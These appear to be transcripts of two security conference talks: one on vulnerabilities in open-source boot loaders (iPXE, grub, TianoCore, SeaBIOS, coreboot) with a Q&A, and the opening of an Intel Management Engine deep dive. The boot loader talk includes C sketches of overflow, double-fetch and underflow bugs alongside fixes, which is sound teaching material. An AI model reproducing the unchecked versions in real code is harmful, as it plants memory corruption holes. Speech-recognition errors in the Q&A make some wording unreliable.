And a surprising number of boot loaders don't have 802.11, so I don't know if that's on purpose or just "we didn't get to having this feature yet, but we will at some point, and obviously it'll have bugs when we implement it." But we did find one that has it, and I'll get to that in a second. One thing I did want to mention is that if you look at 802.11 frame parsing, depending on which device you have and particularly which radio your device is using, you'll have radios that do a lot of parsing on the radio itself, in which case the stack is kind of covered — at least you hope it is — because the radio does a bunch of validation. But then there's a whole bunch of radios that just take packets from the air and don't do anything with them, and just pass them on to the OS. That's the stuff that's interesting from an attack surface point of view if you're looking to attack the boot loader and not the firmware. So yeah, we looked at iPXE, and of course, any time you do any kind of Wi-Fi stuff, the first thing you do is look for an SSID, right? This is what this thing does, and it has this SSID buffer — an SSID can be up to 32 bytes, so that is 32, well, it's 33 bytes because it's 32 plus 1 — and it has this loop where it goes over the IEs that it gets, and then when it finds the right one, the IE for an SSID, it says okay, we'll take this IE and we'll do IE length, and IE length is a uint8, so it can be up to 255, and it copies the SSID IE into the SSID buffer, which is only 32 bytes, causing memory corruption. So that's iPXE for you. Okay, so the next one, if you're thinking networking, would be Bluetooth, and Joe and I have actually looked at proprietary bootloaders that have Bluetooth support. Unfortunately, we can't talk about those bugs because they're covered by non-disclosure agreements, and we tried really, really hard to find a similar equivalent in any kind of open source bootloader, and we couldn't find one. So unfortunately we can't give examples of Bluetooth bugs in open source bootloaders, but I do want to talk in general terms about what we have seen and where we suspect the bugs are going to be if somebody does do this in an open source bootloader, or something that's a new bootloader. Also, if you're going to do Bluetooth in a bootloader, it's usually for HID devices, right — keyboard and mouse — so this usually ends up being for consumer devices. But in general, if you look at a Bluetooth stack and you're looking for any kind of parsing bugs, there are three recurring themes that we saw when we looked at the Bluetooth stacks that we have, and this is if you look at the lower layers like L2CAP and things like that. The first is usually related to frames and frame lengths, so very, very large frames: a frame can be up to about 65,000 bytes because the length is a uint16, and if you create really large frames, right up to the edge, that tends to blow up Bluetooth stacks. The other one is if you create very, very, very short frames — less than what something is expecting — that tends to blow up your Bluetooth stack. And then lastly, because L2CAP can have fragmentation, you can have individual fragments that get added together, and every fragment can be X amount of bytes, but the whole thing can be up to 65,000 bytes in total.
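Here is a minimal sketch of that SSID information-element bug; the struct and function names are illustrative, not iPXE's actual code:

#include <stdint.h>
#include <string.h>

struct scan_result {
    char ssid[32 + 1];            /* 802.11 caps SSIDs at 32 bytes        */
};

void handle_ssid_ie(struct scan_result *r, const uint8_t *ie)
{
    uint8_t ie_len = ie[1];       /* uint8 from the frame, 0..255         */

    /* BUG: a malicious AP can claim an "SSID" longer than 32 bytes.      */
    memcpy(r->ssid, &ie[2], ie_len);
    r->ssid[ie_len] = '\0';
}

void handle_ssid_ie_checked(struct scan_result *r, const uint8_t *ie)
{
    uint8_t ie_len = ie[1];

    if (ie_len > 32)              /* clamp/reject before copying          */
        return;
    memcpy(r->ssid, &ie[2], ie_len);
    r->ssid[ie_len] = '\0';
}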
So if you start playing around with the fragmentation, we've seen numerous Bluetooth stacks blow up. Again, I wish I could have shown an actual bug here, but I wasn't able to find any in the open source boot loaders. So moving on to USB. This is a prime attack surface in boot loaders, obviously. If you haven't followed the news in the last couple of weeks and months, this has shown up in a number of devices. At least up till recently, I think this was sort of under-reported, or people didn't quite care about it. But to me the USB stack is — any time I look at a boot loader, my first thought is NVRAM and number two is USB. And USB is interesting because obviously a lot of boot loaders support USB, because they'll use it either for storage or for things like Ethernet dongles, but often for storage, where you either expose certain files or you try to do some kind of recovery boot from USB or something like that. And so basically, if you start looking at how USB works at a slightly lower level, it's not like PCI, it's more packet based, and what happens when a device talks to a host is that the device is asked for quote-unquote descriptors. These descriptors say certain things about your device, and based upon the number of descriptors that the host asks from you, and all the answers you give in the descriptor responses, the host can then figure out what kind of device you are and what class you are and what functionality you expose and all these kinds of things. And so a lot of these descriptors end up being parsed, and being parsed wrong. And so generally we often see either straight-up overflows or double fetches, because the way descriptors work is they're variable-length content but the headers are predefined, and the way it works is you first ask for the header, and then based on the length in the header, you ask for the thing again — except the USB protocol doesn't allow you to just get the payload, you have to reread the whole thing, so you have to reread the header that you already had. And so in most implementations what happens is you go get the header, you allocate a buffer, and then you go get the header and payload again, and you overwrite the original header. Which means you get to overwrite the original header length, and so you can have a TOCTOU where your device gives you a header with a good length, and then the second time it gives you a descriptor with a bad length, and if your host doesn't validate that both lengths are the same, bad things happen. And yeah, straight-up overflows happen too, because nobody ever expects the USB device to lie. There's an example in grub, for example, where it goes and gets a descriptor, and the descriptor says, oh, here's my config count, I have this number of configurations, go and fetch those descriptors as well. And there is a predefined array for the number of configurations that grub has, and it doesn't correlate that with the config count — it just always assumes the config count is less than or equal to the array. And so if you have a malicious device and you say, hey, I know your array is 32 elements, but I'm going to give you 64 configurations, it'll happily write 64 configurations into a place that can only hold 32 of them. And exactly the same thing for the number of interfaces.
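To make the double fetch concrete, here is a hedged sketch; usb_get_descriptor() is a placeholder standing in for whatever a given stack uses to issue GET_DESCRIPTOR, not a real API, and the validation shown is the check many stacks forget:

#include <stdint.h>
#include <stdlib.h>

struct desc_header {
    uint8_t bLength;
    uint8_t bDescriptorType;
};

/* Placeholder: issues GET_DESCRIPTOR and copies up to len bytes of the
 * device's (fully attacker-controlled) response into buf. */
int usb_get_descriptor(uint8_t type, void *buf, uint16_t len);

int fetch_descriptor(uint8_t type)
{
    struct desc_header hdr;

    if (usb_get_descriptor(type, &hdr, sizeof(hdr)) < 0)
        return -1;
    if (hdr.bLength < sizeof(hdr))          /* sanity check on claimed size */
        return -1;

    uint8_t *full = malloc(hdr.bLength);
    if (full == NULL)
        return -1;

    /* The second fetch re-reads the header too; a malicious device can
     * now report a different bLength in this copy.                        */
    if (usb_get_descriptor(type, full, hdr.bLength) < 0) {
        free(full);
        return -1;
    }

    /* The check that is often missing: both fetches must agree, or the
     * embedded length can't be trusted by anything downstream.            */
    if (((struct desc_header *)full)->bLength != hdr.bLength) {
        free(full);
        return -1;
    }

    free(full);
    return 0;
}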
TianoCore had similar bugs. This was TianoCore, where they go and get a descriptor, and the descriptor length says, okay, now go fetch me the whole thing, and use that descriptor length — except the original hub descriptor was a very small struct, and the descriptor length is a uint8, so you can say up to 255 bytes, and that would have smashed memory and caused a stack corruption. And as you can see here, the fix wasn't actually to add a bounds check, but just to make the buffer bigger — because the length is a uint8, if you just make the buffer 256, then any length you give it will fit within the buffer. Yeah, this is an example in SeaBIOS of the classic double fetch, where it goes and gets the header, does an alloc based on the header, and then gets the header again with the content, and it doesn't verify that the wTotalLength from the first fetch is the same as the wTotalLength from the second fetch. And because that verification isn't there, whoever calls this thing can no longer trust wTotalLength, because it could be invalid. And so, as I said, USB to me is one of the prime attack surfaces for secure boot, and so I want to very, very briefly mention two recent real-world cases where devices got broken into because of USB parsing in the boot loader. So this is the case of the Nintendo Switch's Tegra — this was done by the fail0verflow people about a year or so ago — where basically you give it a length that's not validated, and then a memcpy, and that causes memory corruption. And then the recent iPhone checkm8 — this is slightly more complicated because it wasn't a straight memory corruption, but if you fiddle around enough with the state, it sort of gets out of sync, and it has all these pointers that it still considers to be alive but the memory has been freed, and so this ends up being a use-after-free, but it is triggered by a sequence of USB packets that are being sent. Right, so that's it for USB. Obviously a bunch of the buses — almost any bus on your device, if your boot chain uses it — is interesting attack surface, and that's SPI, I mean SPI flash can't be trusted, SDIO, I2C, LPC, even your TPM — right, even the TPM response you get back from the TPM can't be trusted, because somebody could desolder your TPM and pretend to be your TPM, and if you don't validate the data you get from the TPM, you end up with memory corruption. So this is, for example, what happened in SeaBIOS. SeaBIOS talks to the TPM, and it goes and gets this structure, and you can send it less than what it expects, and then basically they subtract the size of a struct from the smaller amount you sent, and that causes an integer underflow, which ends up with a really big size, and then that size is given to malloc, and malloc internally has an int overflow, so that really big size then becomes a very small size, and then they copy into it and that causes memory corruption. So this is a combination of two bugs, right: one is where the sizes are wrong, and secondly the malloc has an internal integer overflow. And this is the malloc internals of SeaBIOS, which I don't want to dive into now because it's pretty convoluted and complex — I'll leave it as an exercise to the audience to figure out where the int overflow is, and technically it's not an overflow because it's a bunch of shifting being done, but it essentially comes down to an int overflow. Yeah, there we go. Yep, there we go. Okay.
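The TPM case boils down to a length subtraction on untrusted input. Here is a hedged sketch with simplified structures and forced 32-bit arithmetic (as you would have in the boot environment); it is not SeaBIOS's real code:

#include <stdint.h>

struct rsp_header {
    uint16_t tag;
    uint32_t total_len;
    uint32_t code;
};

/* rsp_len comes from the (untrusted) device. If it is smaller than the
 * header, the unsigned subtraction wraps to a huge value, which then
 * feeds an allocator with its own wrap-around and ends in a short
 * allocation followed by a long copy. */
int handle_response(const uint8_t *rsp, uint32_t rsp_len)
{
    uint32_t payload_len = rsp_len - (uint32_t)sizeof(struct rsp_header); /* BUG */
    (void)payload_len;
    (void)rsp;
    return 0;
}

int handle_response_checked(const uint8_t *rsp, uint32_t rsp_len)
{
    if (rsp_len < sizeof(struct rsp_header))   /* check the minimum first */
        return -1;
    uint32_t payload_len = rsp_len - (uint32_t)sizeof(struct rsp_header);
    (void)payload_len;
    (void)rsp;
    return 0;
}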
So another attack surface that is interesting but often overlooked on devices, except for UEFI, is System Management Mode. There have been, over the last decade and a half, numerous presentations about SMM attack surface and breaking SMM handlers for UEFI, because it's an x86 thing and you see this in UEFI stacks, and it was a cat-and-mouse game where for years somebody breaks something, then UEFI fixes it, then somebody breaks it again and UEFI fixes it again, and somebody breaks it again and UEFI goes, okay, let's do a mitigation for this — and this has gone on for like 15, 16 years, and occasionally people still find bugs, but by and large UEFI does fairly well now with regards to SMM handling. There's some third-party stuff that still breaks occasionally, but in general they've got a handle on this. Now, what if you're using x86 but you re-implement your own boot loader and you don't use UEFI, right? Well, that means you're going to run into all the same problems UEFI had, and you're going to screw it up in all the same ways, and it'll take you another 15 years to get it right. But I guess, if you were to try it the first time, this is what coreboot does, and to their credit they say, oh, we get input, we should range check it — and their range check says TODO. Okay, so now I've talked about a bunch of buses. The thing that, to me, separates these from other things is when you do DMA. Generally, for as long as DMA has been around, DMA is game over: if you get DMA, then that's it, there's no trust boundary. Obviously that's no longer true. We have IOMMUs, and if you use them, and if you have a device that has this available, then all of a sudden DMA can be stopped, it can be contained, it can be regulated, and so it's no longer game over and you can implement a trust boundary. A few things there. A: if you are an embedded device and you're using IOMMUs, you are way ahead of the curve, because not that many people are doing this, right? You should, but it takes some effort. There are obviously many different IOMMUs — it depends on your architecture and the board you have and all sorts of things. So Intel has VT-d, ARM has the SMMU, AMD has the Device Exclusion Vector and it's got a few other ones as well. But basically, if you use one of these, DMA is no longer the game over. Now, that doesn't mean that you're in the clear. Once you define DMA as an attack surface, you have to defend it, and that's where you get some difficulty, because you'll end up using drivers that were written before it was a trust boundary — and I mean, no one has ever written a DMA handler with a trust boundary in mind, because you assumed there was no trust boundary. So now, if you start using the IOMMU, you have to go back and look at where am I doing DMA, and now I can no longer trust what I get back from DMA, and you have to go validate all this stuff. But even if you do all of that right — which by the way is very hard, and you probably won't do it right, but let's say you do — secondly, because DMA is now a trust boundary, any time you open up a memory window for a device, you can't just open it up, you have to clear the memory first, because otherwise you're now leaking memory to the device, right? So all these new things show up if you take DMA as a trust boundary. And let's say you do that right — well, now you still have a dependency on the IOMMU, because you are assuming the IOMMU is perfect, when it probably isn't, right?
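What "DMA becomes a trust boundary" means in practice is roughly this sketch; the descriptor layout is made up and iommu_map is a placeholder, not a specific API:

#include <stdint.h>
#include <string.h>

#define DMA_WIN_SIZE 4096u

struct dma_desc {
    uint32_t offset;    /* where in the window the device put the payload */
    uint32_t len;
};

static uint8_t dma_window[DMA_WIN_SIZE];

/* Before exposing the window to the device, wipe it: otherwise stale
 * host memory leaks out through the newly opened mapping.                */
void open_window_for_device(void)
{
    memset(dma_window, 0, sizeof(dma_window));
    /* iommu_map(dma_window, sizeof(dma_window), device_id);  placeholder */
}

/* After the device writes, everything inside the window is still
 * attacker-influenced and has to be bounds-checked before use.           */
int consume_device_result(uint8_t *out, uint32_t out_len)
{
    const struct dma_desc *d = (const struct dma_desc *)dma_window;

    if (d->len > out_len ||
        d->offset > DMA_WIN_SIZE - sizeof(*d) ||
        d->len > DMA_WIN_SIZE - sizeof(*d) - d->offset)
        return -1;

    memcpy(out, dma_window + sizeof(*d) + d->offset, d->len);
    return 0;
}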
I haven't really gotten to this part yet, but one of my plans for the future is to go look at IOMMUs and see if I can attack the IOMMU and find bugs there. I strongly suspect there will be side channels and logic bugs and maybe even some hardware implementation bugs. So bug-wise, this is where it gets design-y, right? This is UEFI today — it's EDK2 platform code — where it has support for the IOMMU, and they're ahead of the curve. But if you look at the spec, there's no good handover protocol from UEFI to the next stage. And so UEFI basically boots up and very early configures the IOMMU and makes sure that devices can't peek or poke arbitrary physical memory, and then it does all of its stages, and then when it's about to hand off, it goes, well, I don't know if the next guy supports the IOMMU, so it undoes all the IOMMU programming it did, turns the thing off, opens up everything and then hands it over to the next guy. So you did all this work for nothing. And this is a spec bug, and it's being worked on — people are very much aware of this. People at Apple have fixed this for their devices. This is going to get fixed in the future, but given that this has to be done by spec, it takes a while, because you have to get people to agree to it and then have numerous different implementations implement it. And this is where I hand it back over to Joe. Yeah, so hardware is pretty much out of scope for the presentation. We did not look at any of this, but we thought it would be naive to not at least mention it to people. And what we mean by that are things like glitching, side channels, silicon stuff. So with glitching you have fault injection, and a lot of times people go after things like the signature verification, so they'll basically glitch that part and then they'll start running unsigned code. A recent example of some glitching was done by fail0verflow for the PS4 Syscon. I forget the specifics, it's been a while — really, really good blog post, you should check it out — but I think it went to an infinite loop, like, go to debug mode or something, and it would say that's not enabled, infinite loop, and then they glitch out of it and it initializes debug mode. So stuff like that you obviously should be concerned with. Then clearly side channels, with timing discrepancies, power discrepancies, things like Spectre or Meltdown, speculative execution in general — these are where people are leaking secrets, or going after keys so they can start signing their own code, stuff like that. And then chip stuff. And this is somewhat interesting because it's obviously only relevant for a very sophisticated attacker. It's going to be somebody who has very expensive equipment. They do things like decapping, they use FIBs and SEMs, they can do things like optical ROM extraction and get the boot ROM and then start auditing that and then find a bug and exploit it. And obviously that's totally out of scope for the presentation. But one thing that's interesting about this is that presently not a lot of people have this expensive equipment. But I think very soon you have people like John McMaster and such who have a SEM in their garage, right?
And so you're going to eventually start getting these regular hackers in their garage who will get this equipment as the older equipment becomes more affordable, and maybe that opens us up to more realistic threats, instead of people just kind of ignoring it and going, eh, I'm not worried about somebody with a quarter of a million dollars worth of equipment. Now it's turning into somebody who dropped 10K or 15K. And then a quick note on code integrity. It's something that people mess up a lot. It's kind of hard to do, right? You have people that do weak or no crypto, and you have blacklist problems — an example of that is that there's finite space for the blacklist, and it will eventually get exhausted. So when you have stuff like what I mentioned, where you have a signed grub: there's a known bug in a signed grub binary that was released by Kaspersky, and if that's not on the blacklist of your UEFI platform at home, you can just load that up and then exploit it, and you've just broken Secure Boot. And it's not going to get fixed until that platform has an up-to-date blacklist. And eventually, if all this stuff gets blacklisted, that list will be full and then they can't blacklist anymore. So there's a concern there. And then you'll have issues where they'll only sign certain portions, not the full blob, so you can still modify certain parts, or sometimes you'll see they'll just check for a signature existing but they don't validate it — really, really dumb stuff. So, conclusions. Obviously this is the tip of the iceberg. There's a lot of stuff we didn't look at. And if it wasn't clear, we did not really audit these things. We literally would chat with each other every day and be like, hey, we need a SeaBIOS bug. Okay, give me an hour. Okay, I got one. Okay, check the box and then let's move on to the next one. Our goal was to have an example of a bug for each item of the attack surface we looked at, and that was it. So once we found one, we stopped. So you guys should go hunting and have fun. But if it wasn't obvious, there's a surprising amount of low quality code. It's kind of crazy, and it's pretty clear that not a lot of people are looking at this stuff. And one thing that kind of sucks is you get into NDA hell really, really, really quick if you want to look at any of this proprietary stuff. If you're interested in Qualcomm stuff, for example, and you want to get some documentation or look at it, you pretty much have to sacrifice a firstborn to get access to that stuff. It's just not going to happen, and it's kind of silly. So our advice and call to action is: people should be minimizing their images, their boot environments, their host environments. Turn off features you don't need. If you don't need a network stack, why have it? If you don't need USB, why have it? All you're doing is enabling an attack surface for somebody to leverage. And something that we see a lot, which is insane, is these little embedded devices that are running Linux and they have literally more drivers than our desktop at home. It's just like, what is going on here? It doesn't make sense. You should really, really, really work on limiting the attack surface. And really quick, mitigations: there aren't any in most environments. Yeah, there just aren't any.
As you can see from the example from before, that was, you know, just from this morning, just really quick, you know, smash and, you know, over at the stored PC. And that's it. Like, there's no ASLR. There's no anything like that, code flow integrity, whatnot. But there's a link to a GitHub and that is an Intel employee that has gone and implemented a lot of these mitigations that are moving into Tiana core. So they are way, way, way ahead of the game of everyone else because they're actually getting a lot of these mitigations, which is quite impressive. And you should check it out because it's interesting code. So kind of a call to action. We really hope that this was inspirational to a few of you. If you've never looked at this stuff and it was always this black box that you weren't sure about, you should just start poking around. Go find the slide where we showed where the, you know, build instructions, where and go build some of these things and mess around. And you're going to have fun. And like we said, with no mitigations, you can work on some easier exploit dev stuff and it's cool. But it's clear that a lot of people need to be reviewing this because it's clearly not happening. People should start fuzzing interfaces. Everything we kind of showed should have been found with basic fuzzing. We're kind of at a point where I just said I'm just going to take like a teensy or something and have it just, you know, do that classic descriptor double fetch because I think we've seen that in like every USB stack. Like it just make a device and just start plugging it into stuff and just watch it break. And then obviously periodic reviews and whatnot. But yeah, that's pretty much it. So yeah. Well, thank you. Now we have about 10 minutes for Q and a and we will start immediately with the Internet. Thank you. Has the grab issue been fixed yet? And was the code unique to grab or borrowed from, you know, elsewhere? I don't think it's been fixed yet. And this was the this was from whatever the official group repository was. All right. If you have a question in the room, please line up at the microphone so I can see you. And now microphone number two. So let's say you want to make a more secure laptop. So you came to take poor boot, take a static kernel so that everything is in compiled in no normal no modules. But what about the text text services that such a somebody tries to interrupt the line of why why did this booting for example, that you may be some somehow get into make a maybe DMA access because you you somehow interfere with a let's say Broadcom network device that has some special firmware to optimize the traffic or something and that that this thing gets above over floated above over flow and make some problems on the on the bus or something. Are you talking about attack surface from devices? Yes, it's like that. Yes, I tell you you want to make a good system. So I think the best you can do if you have a laptop that you take a core boot and you take a Linux that you completely compile without module support everything you want to have is in the static kernel and that just boots and the kernel is in the core boot and so it's in the flesh. But you can get a problems by by by let's say some devices that just spit into your memory because they can do a DMA master. Yeah, that's that's that's definitely concern. And that's one of the things we were like, okay, well, if if you do use DMA as it has been forever, then that then it's game over. Luckily, nowadays we have IOMUs. 
So you depending if which situation you are in and what hardware you have, you can configure your device to use the IOMU. And if you're doing that, then even if a certain hardware device is compromised, you can still try to protect you know your CPU and your host from the device by having the IOMU. That I think I hope it answers your question, but it's about as good an answer as I can come up with. So so that's a bit so this is the maximum you can do against some attacks. I mean from a device, I want to make an extreme hard laptop that you use an extreme hostile environment. So again, you want to make a hard laptop that you use in a hostile environment, right? I mean, I think that's the best you can do right. I mean, you can go and look at your host West and look at how it parses the stuff that comes from the bus because there'll be there'll be bugs there too. But I think that's the best I can come up with. Yeah, I mean, you minimized the attack surface as much as you can, right? And then once once you have it as minimized as possible, then you just kind of hope hope there's nothing there. But you don't then you don't need to code signing because you have everything in your flesh or you still need some stumps. Oh, you mean the stuff that runs on the host? Yeah, I mean, obviously, let's say you have your corporate on the Linux in the flesh. And so everything is that we have that same. And you maybe take this discussion after the talk because we have more questions. Thanks. And signal angel please. What is your favorite disassembly that you use by reverse engineering the bootloaders? We didn't really we just looked at source code. We need to meet a few places. I mean, for this particular particular in this particular case, most of it was white box. So we didn't have much except for the exploit. We didn't have much need for the for this assembler. I guess a little bit of GDP in general when we do do reverse engineering. I mean, I does my go to I've been playing around with Gidra a little bit. It looks promising. Has on do which is nice. But those are usually and then you know for doing Linux have stuff GDP is nice when you're doing debugging. But generally IDA. Microphone number one place. I have two questions. What's your opinion on the arm trusted from architecture? I'm I have to work with this and I'm a little bit shocked. It's a little bit over complicated. And the second question is, should we also question the boot ROMs? Because what I've seen the special project, it leads me to believe that the boot ROM is also very broken. And then is the question if it's really necessary to harden the other stuff. Right. Yep. Those are those are really good questions. By the way, it sounds like you're working on this. So what your first question was what again? What do you think about the arm trust? Right. Yes. I like you. I've touched upon it in a few engagements. Unfortunately, any of the concrete stuff I can't really talk about because it was covered by non. Yeah, I see you where this is this problem. But I just I share your opinion that there are some things in there that are troubling. With regards to the boot ROMs, your spot answer, I mean, we try to bring this up in the one of the slides is if there's a buck there, you can't fix it. Hardware revision is the only way to fix it. So you kind of screwed. There are some designs you can do to try to minimize it. 
So you could say, okay, well, you can in your boot ROM, you could have a feature that allows for a quote unquote, patching the boot ROM where you can have a piece of something on storage that could overwrite what the boot ROM supposed to do. Obviously, up until that point, whatever's in the boot ROM, still, you can't fix that. But you can you can minimize the amount of stuff in the boot ROM that's not patchable. But you can minimize all of it. I mean, there's going to be some of it that is locked, burned in hardware and can never be fixed for that device. I'd love to hear of a better solution. I don't know of any. No, I was just going to say this kind of touches on when we said people underestimating reverse engineering, they kind of just keep it super, super block box. And it's the secret thing. And then, you know, when somebody finds a way to dump a boot ROM, they start looking at it, then they just see, you know, a bug in a USB USB stack. And then the switch goes down and or the iPhone or whatever else, right? So so yeah, it's from my perspective, that I would say it would make more sense to do more open, open auditing and let more eyes see it instead of hiding it in the corner and in pretending like, well, it's okay because nobody's looking. That's that's at least my perspective on it. I know why why people are super secretive about it. But you need more eyeballs. So maybe if you've got the right context, as my wish would be to get blank chips, so I could flash them with my own boot ROM. So I have a method to prove things and keep the text surface minimum. Yeah. And then there's going to be two other arm dies on there that are circumventing everything that you just did. Do we have more internet questions? Yes. Are you aware of any good and maybe even free bootloader fuzzle? Not in its whole. I mentioned a few places. So if you're doing any kind of file based stuff and you can isolate it, AFL is you know, that's the go to these days for network stuff. There's a couple of interesting ones like is sick and there's some Wi Fi fuzzles and and I think there's you know, some DNS fuzzles or things like that. So that works. I would say the best way in my opinion would be to pull out the interesting components that are doing the parsing and the stuff you're concerned about and write a harness for that. So you don't really need to try to write a fuzzle for that environment. You just pull that feature out and harness it up and then let it you know, run on a bunch of cores. Yes. I think live fuzzle might be very helpful there. All right. Number two, please. Hi. We have producing the occurrence of such errors by using another programming language like that would feature more secure things that compile time or during runtime like maybe Rust. Will it happen? If yes, are there alternative projects that use other languages other than see? I'm not aware. So I think you're right. I think we can reduce the amount of especially the memory corruption stuff. I mean, if you switch to something like Rust, even though I think on occasion there's some Rust corner case that shows up where something doesn't get caught by the verifier, those are weird corner cases. In general, yes. I think you're right. If we switch languages, a lot of memory corruption stuff goes away, but not everything goes away. All the design stuff is still there, right? I'm currently doing that though. 
Well, so there was actually there was a talk by Andrea Barisani yesterday or day before where he's doing a go runtime for an as a as a base for an ARM device. So this is an avenue that is currently in the beginning of being researched and being worked on. I think it's interesting. I think it's a direction one that we could go into. I think there's something there. At the present time, it still seems a bit too early. And the other thing is that while it does reduce the number of bugs that are going to be there in particular memory corruption stuff, it doesn't like there will still be, you know, your logic bugs and your hardware bugs and things like that. So it's not a silver bullet, but it could definitely help. Okay. And we are out of time. Please thank our speakers again.
The Achilles heel of [your secure device] is the secure boot chain. In this presentation we will show our results from auditing commonly used boot loaders and walk through the attack surface you open yourself up to. You would be surprised at how much attack surface exists when hardening and defense in depth is ignored. From remote attack surface via network protocol parsers to local filesystems and various BUS parsing, we will walk through the common mistakes we've seen by example and showcase how realistic it is for your product's secure boot chain to be compromised.
10.5446/53180 (DOI)
The next talk is an Intel Management Engine deep dive, understanding the ME at the OS and hardware level, and it is by Peter Bosch. Please welcome him with a great round of applause. Right, so, everybody hear me? Nice. Okay, so welcome. Well, this is me. I'm a student at Leiden University, and I've always been really interested in how stuff works, and when I got a new laptop, I was like, you know, how does this thing really boot? I knew everything from the reset vector onwards; I wanted to know what happened before it. So first I started looking at the Boot Guard ACM, and while looking through it, I realized that not everything was as it was supposed to be, and that led to a later part in the boot process being vulnerable, which ended up in me discovering this. And I found out, here last year, that I wasn't the only one to find it — Trammell Hudson also found it — and we reported it together and presented it at Hack in the Box. And at the same time I was already also looking at the management engine. Well, there had been a lot of research done on that before, but the public info was mostly on the file system and on specific vulnerabilities, which still made it pretty hard to get started on reverse engineering it. So that's why I thought it might be useful for me to present this work here. So it's basically broken up into three parts. The first bit is just a quick introduction to the operating system it runs, so if you want to work on this yourself, you're more easily able to understand what's in your face in your disassembler. And then after that, I'll cover its role in the boot process, and then also how this information can be used to start developing new firmware for it, or to do more security research on it. So first of all, what exactly is the management engine? There's been a lot of fuss about it being a backdoor and everything. Well, in reality, whether it is or not depends on the software that it runs. Basically, it's a processor with its own RAM and its own I/O and MMUs and everything, sitting inside your southbridge. It's not in the CPU, it's in the southbridge. So when I say this is going to be about the sixth and seventh generation of Intel chips, I mean mostly motherboards from those generations. If you run a newer CPU on it, it will also work for that. So yeah, a bit more detail. The CPU it runs is based on the 486, which is funny — it's quite an old CPU and it's still being used in almost every computer nowadays. It has a little bit of its own RAM, it has quite a bit of built-in ROM, it has a hardware-accelerated cryptographic unit, and it has fuses, which are write-once memory used to store security settings and keys and everything. And then some of the more scary features: it has bus bridges to all of the buses inside the southbridge, it connects to the RAM of the CPU and it connects to the network, which makes it really quite dangerous if there is a vulnerability or if it runs anything nefarious. And its tasks nowadays include starting the computer as well as adding management features — this is mostly used on servers, where it can serve as a baseboard management controller to do remote keyboard and video. And it has security: Boot Guard, which is the signing and verification of firmware; it implements a firmware TPM; and there is also an SDK to use it as a general-purpose secure enclave. So on the software side of it, it runs a custom operating system, parts of which are taken from Minix, a teaching operating system by Andrew Tanenbaum.
So it's a microkernel operating system, it runs binaries that are in a completely custom format, and it's really quite a high-level system, actually, if you look at it in terms of the operating system. It runs mostly like Unix, which makes it kind of familiar, but it also has large custom parts. And yeah, like I said before, in this talk I'm going to be speaking about sixth and seventh generation Intel Core chipsets. So that's Sunrise Point; Lewisburg, which is the server version of this; and also the laptop systems-on-chip — they're just called Intel Core low power — which include the chipset as a separate die, so it also applies to them. In fact, I've been testing most of the stuff I'm going to tell you about on the laptop that's sitting right here, which is a Lenovo T460. The version of the firmware I've been looking at is 11.0.0.1205. Right. So I do need to put this up there: I am not a part of Intel, nor have I signed any contracts with them. I found everything in ways that you could also do; I didn't have any leaked NDA stuff or anything that you couldn't get your hands on. Also, it's a very wide subject area, so there might be some mistakes here and there, but generally it should be right. Right. Well, if you want to get started working on an ME firmware, you've got to deal with the image file. You've got your SPI flash — most of its firmware lives in the same flash chip as your BIOS — so you've got that image. And then, how do you get the code out? Well, there are tools for that. It's already been extensively documented by other people, and you can basically just download a tool and run it against it, which makes this really easy. This is also the reason why there hadn't been a lot of research done yet: before these tools were around, you couldn't get to all of the code. The kernel was compressed using Huffman tables, which were stored in ROM, and you couldn't get to the ROM without getting code execution on the thing. So there was basically no way of getting access to the kernel code, and I think also to the system library, but that's not a problem anymore — you can just download a tool and unpack it. So the Intel tool to generate firmware images, which you can find in some open directories on the Internet, has Qt resources — XML files — which basically have the descriptions for all of the file formats used by these ME versions, including names and comments to go with those structure definitions. So that's really useful. Right. So when you look at one of these images, it has a couple of partitions; some of them overlap, some of them are storage and some are code. So there are the main code partitions, FTPR and NFTP, which contain the programs it runs. There's MFS, which is the read-write file system it uses for persistent storage. And then there's a log-to-flash option, and the possibility to embed a token that will tell the system to unlock all debug access, which has to be signed by Intel, so it's not really of any use to us. And then there is something interesting: the ROM bypass. Like I said, you can't get access to the ROM without running code on it. And the ROM is mask ROM, so it's internal to the chip. But Intel has to develop new ROM code and they have to test it without re-spinning the die every time, so they have the possibility, on an unlocked pre-production chipset, to completely bypass the internal ROM and load even the early boot code from the flash chip. Some of these images have leaked, and you can use them to get a look at the ROM code even without being able to dump it. That's going to be really useful later on. So then you've got these code partitions and they contain a whole lot of files. There are the binaries themselves, which don't have any extension, and there are the metadata files — the binary format they use has no headers, nothing included, and all of that data is in the metadata file. And when you use the unME11 tool, it can actually convert those to text files for you, so you can just get started without really understanding how they work.
It's going to be really useful later on. So then you've got these code partitions and they contain a whole lot of files. So there's the binaries themselves, which don't have any extension. There's the metadata files, so the binary format they use has no headers, nothing included, and all of that data is in the metadata file. And when you use the UnmE11 tool, you can actually convert those to text files for you so you can just get started without really understanding how they work. Yeah, so the metadata, it's tag length value structure, which contains a whole lot of information the operating system needs. It has the info on the module, whether it's data code, where it should be loaded, what the privileges of the process should be, a checksum for validating it, and also some higher level stuff such as device file definitions if it's a device driver or any other kind of server. I've actually written some code that uses this in some get-ups, so if you want to closer look at it, some of the slides have a link to a get-up file in there, which contains the full definitions. Right, so all of the code on the UnmE is signed and verified by Intel, so you can't just go and put in a new binary and say, hey, let's run this. The way they do this is they, in Intel's manufacturer time fuses, they have the hash of the public key that they use to sign it, and then on each flash partition there is a manifest which is signed by that key, and it contains the SHA hashes for all the metadata files, which then contain a SHA hash for the code files. It doesn't seem to be any major problems in verifying this, so it's useful to know, but you're not really going to use this. And then modules themselves, as I've said, they're flat binaries, mostly. The metadata contains all the info the kernel uses to reconstruct the actual program image in memory. And a curious thing here is that the actual base address for all the modules, for all the programs, is the same across an image, so if you have a different version it's going to be different, but if you have two programs from the same firmware, they're going to be loaded at the same virtual address. Right, so when you want to look at it, you're going to load it in some disassembler, like for example IDA, and you'll see this. It disassembles fine, but it's going to reference all kinds of memory that you don't have access to. So usually you think maybe I've loaded at the wrong address or am I missing some library? Well, here you've loaded it correctly if you use the address from the metadata file, but you are in fact missing a lot of memory segments. And let's just take a look at each of these. It's calling it search and decode, and it's pushing a pointer there which is data. And what's that? So it has shared libraries, even though it's flat binaries, it actually does use shared libraries because you only have one and a half megabyte of RAM. You don't want to link your C library into everything and waste all the memory you have. So there's the main system library, which is like libc on a Linux system. It's in a flash partition, so you can actually just load it and take a look at it easily. And it starts out with a jump table, so there's no symbols in the metadata file or anything. It doesn't do dynamic linking. It loads the pages for the shared library at a fixed address, which is also in the shared libraries metadata, and then it's just there in the process of memory, and it's going to jump there if it needs a function. 
